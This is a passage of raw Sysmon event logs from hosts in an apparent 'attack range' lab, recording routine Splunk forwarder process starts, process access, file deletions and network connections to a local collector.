Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018238Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:28.668{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64A51927A12255A573CAF4C4EE93E71D,SHA256=7449935DA1843431255541C7B9C8AEC9F92975034111EA071131BD1D4CDFFBFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5EC-63C7-7806-00000000AF02}1948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E5EC-63C7-7806-00000000AF02}1948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E5EC-63C7-7806-00000000AF02}1948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.986{FE4C2B44-E5EC-63C7-7806-00000000AF02}1948C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000045902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:25.678{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56447-false10.0.1.12-8000- 23542300x800000000000000045901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:28.036{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=503C52CA6E02938CC6DE97446044C00A,SHA256=32738676F157AAF035F4E44979C1EED63EE59E758597E89BFC2D0E26DC8BE9EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018237Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:26.923{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50172-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000018265Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018264Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018263Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018262Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018261Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018260Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018259Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018258Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018257Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018256Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018255Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018254Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018253Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.846{E5A8D418-E5ED-63C7-2F02-00000000B002}736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018252Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:29.752{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79B5D723D0250E811EC1C5627AC62EF4,SHA256=1407A2CFA810E14DD23DA885CCCB9CCE036E6CC759EA1D55568BCC53D441270A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E5ED-63C7-7906-00000000AF02}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:29.759{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 